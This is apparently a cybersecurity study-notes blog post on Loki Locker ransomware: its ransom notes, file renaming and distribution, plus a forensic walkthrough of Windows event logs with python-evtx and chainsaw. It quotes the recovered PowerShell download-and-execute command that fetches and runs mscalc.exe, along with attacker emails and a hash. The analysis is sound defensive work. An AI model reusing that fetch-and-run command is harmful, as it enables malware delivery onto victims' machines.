We covered analyzing Windows events logs using Python-evtx and chainsaw. We started with extracting Powershell logs and from there we researched the artifacts with chainsaw to discover the initial root cause of the ransomware infection. By following the chain of spawned processes, we discovered an office document as the initial cause of the ransomware infection.

Offensive Security Certified Professional Study Notes

Cyber Security Study Notes

What is Loki Locker Ransomware

Once Loki Locker ransomware infects the target machine, the ransom notes left by Loki Locker notify victims that all of their files have been encrypted and that they can get additional instructions by sending their ID to recoverdata@onionmail.org or recoverdata@mail2tor.com. Additionally, they provide victims with a free decryption service for a single encrypted file (which cannot include sensitive data).

The ransom messages from Loki Locker also caution against renaming files or attempting to decrypt them using unaffiliated software. Victims risk permanently damaging their information if they do this.

To sum up, all three ransom notes advise their victims to get in touch with hackers via the email addresses they have supplied in order to learn more about data decryption.

The majority of ransomware variations use powerful encryption methods to encrypt files. As a result, victims are unable to decrypt files without the appropriate tools, which are only available from hackers. In certain instances, victims may be able to decrypt their files for free if a third-party program is accessible online.

Regretfully, there isn’t a free program that can unlock files that Loki Locker has encrypted. Furthermore, it has been verified by numerous victims that the developers of Loki Locker never supply the decryption tool once the ransom is paid, therefore you should never do that. If a victim has a data backup, they can use it to get their files recovered without having to get in touch with or pay the hackers.

An further crucial aspect of ransomware assaults is that the malware that has been installed has the potential to encrypt new files or infect computers inside the local network. On the compromised operating system, ransomware can be removed to stop any additional damage. Nevertheless, files that have already been encrypted cannot be accessed after uninstalling it.

How Does Loki Locker Ransomware Work?

Loki Locker encrypts the victims’ files to keep them from being accessed. It also creates the “Restore-My-Files.txt” text file, modifies the desktop background, renames all encrypted files, and pops up a window.

The text file, pop-up window, and wallpaper for Loki Locker all include contact information for the attackers.

When renaming encrypted files, Loki Locker adds the “.Loki” extension, the victim’s ID, the recoverdata@onionmail.org email address, and the original filename.

For instance, “1.jpg” becomes “[recoverdata@onionmail.org][C279F237]1.jpg.Loki”; similarly, “2.jpg” becomes “[recoverdata@onionmail.org][C279F237]2.jpg.Loki”; and so on. Newer versions of Loki Locker replace “.Loki” with the “.Rainman” or “.PayForKey” extension.

How Loki Locker Ransomware is distributed?

Infected email attachments (macros), torrent websites, malicious ads.


All files are encrypted and cannot be opened without paying a ransom. Additional password-stealing trojans and malware infections can be installed together with a ransomware infection.

Uncovering Loki Locker Ransomware By Investigating Windows Event Logs with Python-evtx tools

We extracted Windows event logs from the machine infected with Loki Locker ransomware.

If you are on a Linux workstation, this method may work best for you.
Installing Dependencies
First we install the suit of tools using below command

sudo apt install python3-evtx

Next we will download and install cargo because we will need it for chainsaw tool

curl https://sh.rustup.rs -sSf | sh

Follow with the prompts to complete the installation.
Then we will clone the chainsaw repo from github

git clone https://github.com/WithSecureLabs/chainsaw.git

And then we install using below command

cargo build --release

Once the build has finished, you will find a copy of the compiled binary in the target/release folder.

We can get started by running evtx-dump.py against any of the event files

evtx_dump.py 'Windows Powershell.evtx' > output.txt

By taking a closer look, we find a powershell process performing a call to an IP address to retrieve mscalc.exe

(New-Object System.Net.WebClient).DownloadFile('', 'C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe');  
Start-Process 'C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe'

Then we use chainsaw to extract other indicators of compromise

chainsaw search mscalc.exe -i /Logs/ > mscalc-output.txt

And we found this hash: B94F3FF666D9781CB69088658CD53772

By looking up the hash in VirusTotal, we confirm its Loki Locker Ransomware.

You can also check if the ransomware created a startup entry by checking the scheduled tasks:

chainsaw search schtasks -i /Logs/ > schtasks-output.txt

Text in the Loki Locker’s desktop wallpaper:

Loki locker

All your files have been encrypted due to a security problem with your computer
If you want to restore them, write us to the e-mail:
Write this ID in the title of your message: –
In case of no answer in 24 hours write us to this e-mail:

Loki Locker Ransomware Removal

Download Combo Cleaner.

Certain third-party programs may be able to restore data, depending on the circumstances (ransomware infection quality, type of encryption scheme, etc.). As a result, we suggest using the Recuva utility created by CCleaner. With this tool, you may recover data from over a thousand different data kinds, including documents, music, video, and images, all with minimal training required. Furthermore, the feature for recovery is totally free.

You can also check this link for Ransomware decryption tools.

Video Walkthrough | Loki Locker Ransomware Detection

About the Author

I create cybersecurity notes, digital marketing notes and online courses. I also provide digital marketing consulting including but not limited to SEO, Google & Meta ads and CRM administration.

View Articles